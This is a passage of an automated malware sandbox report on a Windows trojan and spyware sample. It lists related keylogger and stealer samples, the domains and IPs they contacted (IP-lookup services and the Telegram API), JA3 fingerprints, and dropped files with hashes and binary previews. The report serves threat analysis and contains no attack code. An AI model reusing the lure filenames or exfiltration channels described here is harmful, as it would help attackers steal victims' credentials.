                                                                  Number of existing drivers analysed:0
                                                                  Number of injected processes analysed:0
                                                                  Technologies:
                                                                  • HCA enabled
                                                                  • EGA enabled
                                                                  • AMSI enabled
                                                                  Analysis Mode:default
                                                                  Analysis stop reason:Timeout
                                                                  Sample name:4NG0guPiKA.exe
                                                                  renamed because original name is a hash value
                                                                  Original Sample Name:ec0c8d7a3312e95aa25f0ce8dd738ed1660246374f6a6d1a268b97ae4d3c4d47.exe
                                                                  Detection:MAL
                                                                  Classification:mal100.troj.spyw.evad.winEXE@3/8@5/5
                                                                  EGA Information:
                                                                  • Successful, ratio: 100%
                                                                  HCA Information:
                                                                  • Successful, ratio: 96%
                                                                  • Number of executed functions: 151
                                                                  • Number of non-executed functions: 115
                                                                  Cookbook Comments:
                                                                  • Found application associated with file extension: .exe

                                                                  Warnings

                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                  • Excluded IPs from analysis (whitelisted): 4.245.163.56, 20.12.23.50
                                                                  • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                  • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                  • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.

                                                                  Simulations

                                                                  Behavior and APIs

                                                                  TimeTypeDescription
                                                                  21:05:34API Interceptor569350x Sleep call for process: 4NG0guPiKA.exe modified

                                                                  Joe Sandbox View / Context

                                                                  IPs

                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                  132.226.8.169uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                  • checkip.dyndns.org/
                                                                  H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  b5BQbAhwVD.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  UF7jzc7ETP.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  V7OHj6ISEo.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  FylY1FW6fl.exeGet hashmaliciousMassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  v4nrZtP7K2.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  ppISxhDcpF.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                  • checkip.dyndns.org/
                                                                  CvzLvta2bG.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                  • checkip.dyndns.org/
                                                                  149.154.167.220n0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                    njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                        ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                          6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                            4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                              JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                  Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                    WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse

                                                                                      Domains

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      reallyfreegeoip.orgn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.16.1
                                                                                      rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.16.1
                                                                                      uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.64.1
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.32.1
                                                                                      VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.48.1
                                                                                      h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.96.1
                                                                                      api.telegram.orgn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      checkip.dyndns.comn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 158.101.44.242
                                                                                      rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 193.122.6.168
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.130.0
                                                                                      h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 193.122.130.0

                                                                                      ASNs

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      TELEGRAMRUn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      CLOUDFLARENETUSn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.16.1
                                                                                      AxKxwW9WGa.exeGet hashmaliciousFormBookBrowse
                                                                                      • 172.67.186.192
                                                                                      k9OEsV37GE.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.96.1
                                                                                      rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.112.1
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.16.1
                                                                                      XeFYBYYj0w.exeGet hashmaliciousFormBookBrowse
                                                                                      • 188.114.96.3
                                                                                      tfWjjV1LdT.exeGet hashmaliciousFormBookBrowse
                                                                                      • 104.21.36.62
                                                                                      uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.64.1
                                                                                      UTMEMUSuVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.8.169
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      H75MnQEha8.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.8.169
                                                                                      z87sammylastborn.exeGet hashmaliciousMassLogger RATBrowse
                                                                                      • 132.226.247.73
                                                                                      Ddj3E3qerh.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      6cicUo3f8g.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 132.226.247.73
                                                                                      7b4Iaf58Rp.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 132.226.8.169
                                                                                      rXKfKM0T49.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 132.226.247.73

                                                                                      JA3 Fingerprints

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      54328bd36c14bd82ddaa0c04b25ed9adn0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 104.21.80.1
                                                                                      rwlPT9YJt0.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      uVpytXGpQz.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 104.21.80.1
                                                                                      VCU262Y2QB.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      h1HIe1rt4D.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 104.21.80.1
                                                                                      3b5074b1b5d032e5620f69f9f700ff0en0nsAzvYNd.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      njVvgA8pEB.exeGet hashmaliciousMassLogger RAT, PureLog StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      YDg44STseR.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      KtPCqWWnqM.exeGet hashmaliciousUnknownBrowse
                                                                                      • 149.154.167.220
                                                                                      ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      6BRa130JDj.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 149.154.167.220
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 149.154.167.220
                                                                                      ukBQ4ch2nE.exeGet hashmaliciousAgentTeslaBrowse
                                                                                      • 149.154.167.220
                                                                                      JGvCEaqruI.exeGet hashmaliciousAsyncRAT, StormKitty, WorldWind StealerBrowse
                                                                                      • 149.154.167.220
                                                                                      37f463bf4616ecd445d4a1937da06e19ZoRLXzC5qF.exeGet hashmaliciousGuLoader, Snake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      YrCSUX2O3I.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      4AMVusDMPP.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      Cpfkf79Rzk.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      TjoY7n65om.exeGet hashmaliciousSnake KeyloggerBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      Kb94RzMYNf.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      TVPfW4WUdj.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33
                                                                                      WGi85dsMNp.exeGet hashmaliciousGuLoaderBrowse
                                                                                      • 142.250.181.238
                                                                                      • 142.250.186.33

                                                                                      Dropped Files

                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                      C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dllRequest for Quotation New collaboration.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                        Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                          Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                            Request for Quote and Collaboration Docs.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                              REQUEST FOR QUOATION AND PRICES.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                IBAN payment confirmation.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                  Bank Swift and SOA PRN0072003410853_pdf.exeGet hashmaliciousGuLoader, MassLogger RATBrowse
                                                                                                    WC10SCPMaX.exeGet hashmaliciousAzorult, GuLoaderBrowse
                                                                                                      PayeeAdvice_HK54912_R0038704_37504.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                        CL714440147.exeGet hashmaliciousGuLoaderBrowse

                                                                                                          Created / dropped Files

                                                                                                          C:\Users\user\AppData\Local\Temp\nso68A0.tmp\System.dll

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                                                                                                          Category:dropped
                                                                                                          Size (bytes):11264
                                                                                                          Entropy (8bit):5.801108840712148
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:192:e/b2HS5ih/7i00eWz9T7PH6yeFcQMI5+Vw+EXWZ77dslFZk:ewSUmWw9T7MmnI5+/F7Kdk
                                                                                                          MD5:FC90DFB694D0E17B013D6F818BCE41B0
                                                                                                          SHA1:3243969886D640AF3BFA442728B9F0DFF9D5F5B0
                                                                                                          SHA-256:7FE77CA13121A113C59630A3DBA0C8AAA6372E8082393274DA8F8608C4CE4528
                                                                                                          SHA-512:324F13AA7A33C6408E2A57C3484D1691ECEE7C3C1366DE2BB8978C8DC66B18425D8CAB5A32D1702C13C43703E36148A022263DE7166AFDCE141DA2B01169F1C6
                                                                                                          Malicious:false
                                                                                                          Antivirus:
                                                                                                          • Antivirus: ReversingLabs, Detection: 0%
                                                                                                          Joe Sandbox View:
                                                                                                          • Filename: Request for Quotation New collaboration.exe, Detection: malicious, Browse
                                                                                                          • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious, Browse
                                                                                                          • Filename: Request for Quote and Collaboration Docs.exe, Detection: malicious, Browse
                                                                                                          • Filename: REQUEST FOR QUOATION AND PRICES.exe, Detection: malicious, Browse
                                                                                                          • Filename: IBAN payment confirmation.exe, Detection: malicious, Browse
                                                                                                          • Filename: Bank Swift and SOA PRN0072003410853_pdf.exe, Detection: malicious, Browse
                                                                                                          • Filename: WC10SCPMaX.exe, Detection: malicious, Browse
                                                                                                          • Filename: PayeeAdvice_HK54912_R0038704_37504.exe, Detection: malicious, Browse
                                                                                                          • Filename: CL714440147.exe, Detection: malicious, Browse
                                                                                                          Reputation:moderate, very likely benign file
                                                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L.....oS...........!.................'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............................... ..`.rdata..C....0......."..............@..@.data...x....@.......&..............@....reloc..>....P.......(..............@..B................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Local\Temp\nst6786.tmp

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):1315865
                                                                                                          Entropy (8bit):3.5949686472855396
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:12288:j8rRd69L0r8yMuaf+MP9jeCmo5gw7mS2J8OD0ZCPHb5g5YTmVBbTvR4/uWv871W8:Yf6Pgg1U0CT5Tm3vvDypK
                                                                                                          MD5:5A6642E8988A81F18B4290B6822BB259
                                                                                                          SHA1:42D4DF7B97EED5A2840A7E678708CA32EB535E41
                                                                                                          SHA-256:8FA1E9AE96D55A6AE8F0D7AD408782A09B14CD83AF3E43CCAFC0675307D4C445
                                                                                                          SHA-512:71E804077ACB1B60BE07996337400F4B07A37A02CDD39A48E06229D8AF156628AFB9229B43EB4882E26CE274F4550482AB4F7DAF07476E37C3E5385009FE3D54
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.:......,.......,.......\........$......r9......p:............................................................u.........................R...................................................................................................................................................G...J...............h...............................................................g...............................................................j..............................................................................................................................._.......................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Emalje.kap

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):161977
                                                                                                          Entropy (8bit):1.2465706431701635
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:768:j91kr2E4uLB4rAvVSJUxZOKLuPYUIlh6njQqVK+P7T6r6hI4W7lD1jBCgUpo:94irAZug+TLg1cpo
                                                                                                          MD5:818D9B577C6A2CCB8C8D753C89B0AEED
                                                                                                          SHA1:1912E60E75B47E0AC0B0ACDB2B320F0B36D3CE22
                                                                                                          SHA-256:B53DFB245A8D5A0F0FAEEC7E8B4AE273522AC29FD29B33608F9BA7F9ADB90279
                                                                                                          SHA-512:91993AA2E3E2666A3945886101B2B670CD3B0D76CF3CFFF3684DCB310FE324A1C650FAB5D5D00B8CFA49B5A7713FE2DBBA6DC2D8BB8DAC7A169495E6694CE4C6
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:................(.R.............B...........f....H...................................................5....................................5........m............................./................?................4...............................l..........................................U..........................................................#....................M..............................................................g...................................................l..................f....................?.........................._..........................................................................u......x....................l....................~.......................S...C.............................................................................................).................l......................................................................................................................b...k................................................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Jaskendes.Tin19

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):288630
                                                                                                          Entropy (8bit):7.7491676192107075
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:6144:juzLxL0r8yMuaf+MP9jeCmo5gj0D/A/DlsX5YJVCOD0ZCPzzb5wp03sB5aT1pTmP:S9L0r8yMuaf+MP9jeCmo5gw7mS2J8ODW
                                                                                                          MD5:03D02A84B85376B663A29D160AD89822
                                                                                                          SHA1:BED64291853193091B6867F3D890D1F64F210637
                                                                                                          SHA-256:72EC51CE52A19D8DCBA9176D1C3C40E15FE5637AD5721DB27DC4AD0314EB4CF9
                                                                                                          SHA-512:3C7F4EF9C1CFA9B004CA0F4CA6FBD3947C77CD9D1CAF9C18D863FA7C038E4EBB84B8025D4083C0F4F4EAF74684481EEF47CE04FBCDEC175A526D3D0249144E53
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:..........._.....@.............7....[[.......................................t....NNN....''.....GG........................rr..yyy.........O..i......I......zz.z.........xxxx.}}.......................555......E.....yyyyy.+.....{{{........u...r..........q...........R.......".{...............yy........."".1..........u..9999..............T.S......?.......................~~~....<.......33.\.....................................Z......>.....5......................j....p.........777.........g.;..bbb.........|.........y......ssssss.LL........................*..........J......................:....x......qqq.........&...................c.'..........-.................#.....]...iii..........J.s.V...j....YY.......................gg.......|||........oo....(....))..................mmm...c....777...................i.......Y.))........K....!......****...$..............qq..........LL.$...m.........I.VVVV...........................%%%......................))......................__.........................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\Skankeben.Pri

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):149030
                                                                                                          Entropy (8bit):4.598765709098575
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:qAtbIHGVtkzD0DCax4/D7tw1DGdZuFPx/8xFGHM1iaLu/xuuPqhYiieeAK2:qARIHG7s0DD4/lwUcFeGHME5FqCiifAD
                                                                                                          MD5:CC1D8E3E4DC2D1AE30EA61C63E82FFE0
                                                                                                          SHA1:CB85577C8192221AB0B1A85B22786791C7430862
                                                                                                          SHA-256:5244EFBEF13598381119C2942340E9F3CC5AAF2B4D636ED0C32CB4CE5936A3F4
                                                                                                          SHA-512:AAF38BD184E0BC7B4101387E82F31C457481BE5584E94AA004C6E40CE91C919A8D4B1FB795AC3C37963751A093BD6FE840929215046D06F0C0693CAA98D08314
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:.....(............................L.........2222..........,....(...ww..............:............**....=...................fff........?...22...Q..........\........hh..,.0.aa.G.......o.............WW............]]..............A...uu.YYY............II.....g...7777...oooo........b.c.....TT.........BBB....................{{{{........]........................P.....................O...Q........+..RRR.........................6.................g.<.......W.E............................||.........................=.vv.ttt........kkk...........4.&&&...A.......s..../......<<.).......KK.ii.ii.o........44......%......!!!!...............R............... .....................3...I......yyy.......u.;;;........0......................YYY..))...............................-...............55.....................Z...WW................GGGGGGG..........m.........S........dd.....i...............................iii........................@@.......(((...(..........u...........A...............w.....))..e..r.......

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\img2.jpg

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 225x225, components 3
                                                                                                          Category:dropped
                                                                                                          Size (bytes):2929
                                                                                                          Entropy (8bit):7.418910042244289
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:48:j2XBhBOaFxHfEaq1kk1YunCRbvwxhjAxnyHIvR4SnHP7oNLpLR8Fqhr:j2XBv9Fx2kkO7RihjlovpnHPCpaQ1
                                                                                                          MD5:49DAF4E74443D8502F3229468615185F
                                                                                                          SHA1:9BB41BF5F382EE315893366F559FA26D57A4CD5F
                                                                                                          SHA-256:E5EE495A89E55467DB6A396F012EDB6A71D2E762CFC7FC6846FE7259528BF168
                                                                                                          SHA-512:EE9ABC6A19215FED64584BA24736ECBA24139CD03A75530FF351C99A25628410472A28F4EE08E87CE1F75DC79396A2A9C1AC79C399720C320437BC18993B561A
                                                                                                          Malicious:false
                                                                                                          Reputation:low
                                                                                                          Preview:......JFIF...................................................( ..%...!1!%)+.....383-7(-.+...........+...+8+++-+-+-+--+--+7+---+7-7+-7-7++---++-+7--7-+7+-+..........."........................................E........................!.1AQq."a...2...BR....#3Cbr...S......4DUcs..................................................1!............?.................................................................................@...............@........'7.O|.(....i.<..M.4....vZ...-T.,~.&../...m.:.6..oe.;WZ]m[..:..:\.6U...........ey....F..m.I...6..G..S.z4..>..1p.*..E~OG.fQD.............I....$"@...9.g..]d.Ao..!.f../.oH..}.6.INNRm..l..ngV..+G...b$V.N...k.....=.........IR.KoG.qrJ...c..)..N[W..z.....h.R..Tm..*....ME....M....E...9.OI=.roU..%.&..a1p...;.\S..|..x..._U..L....w>...............A$...D....0s.F.)s.uy..\._7......DbE..z....r.E...r7|.1..}=......./.a.r.NJJs.........+...&..,...9.wm..V.ddlx.....e.f..4T.x.y>\..n....7.tu......M.gq[.6.......>.N.#....kzw,..(.QJ*K.L.......... .

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\pinrail.whe

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):461378
                                                                                                          Entropy (8bit):1.252059381950645
                                                                                                          Encrypted:false
                                                                                                          SSDEEP:1536:s3tr+hilKd11tUzcxZg7SBobbR5FF7b7IvSog:sRVmQc3u9F7b76
                                                                                                          MD5:3AD2FE4EA13486258EADDD1E5940A6D7
                                                                                                          SHA1:06D0468A125D754D4534C182D79444DFB7A1CF61
                                                                                                          SHA-256:E4C5F20595C446D20C978CF7B486579BA2FFC17E64B940733B40C89DF4331319
                                                                                                          SHA-512:82328E01492BDB8B23555CB369279A5352B35E0B51A4A4AC88D9F9285BBDABA627FE01139B4F9669847252D5A59FC512B2463A364EFD5C33B83309D6A8985D59
                                                                                                          Malicious:false
                                                                                                          Preview:w......................j..........................p................................................-.......................;....................Y..........................1:....................................................................................G........B...............................................................................^.........................................................o.................'......................... .....................................F..................................................................................................................E...........................................97.....................................K...f.....r..........._...............h........+........................ ........./.............................d........m..........................b...................e.c......................................................................\...........5......t.....................b.................................

                                                                                                          C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\Kopieringsprogrammet\unyouthfully.ske

                                                                                                          Download File
                                                                                                          Process:C:\Users\user\Desktop\4NG0guPiKA.exe
                                                                                                          File Type:data
                                                                                                          Category:dropped
                                                                                                          Size (bytes):225641
                                                                                                          Entropy (8bit):1.2362366155163755
                                                                                                          Encrypted:false
